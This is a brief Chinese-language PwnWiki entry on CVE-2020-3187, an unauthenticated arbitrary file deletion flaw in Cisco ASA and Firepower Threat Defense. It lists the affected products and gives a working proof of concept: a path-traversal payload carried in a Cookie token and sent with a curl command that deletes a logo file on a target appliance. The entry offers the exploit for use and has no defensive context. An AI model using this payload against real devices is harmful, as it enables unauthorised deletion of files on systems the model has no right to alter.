Cicso未經驗證任意文件刪除漏洞 CVE-2020-3187
From PwnWiki
影響系統:
Cisco Adaptive Security Appliance
Cisco Firepower Threat Defense Software
POC:
舉例爲刪除LOGO文件:
payload:
/+CSCOU+/csco_logo.gif
執行:
curl -H "Cookie: token=../+CSCOU+/csco_logo.gif" https://target/+CSCOE+/session_password.html
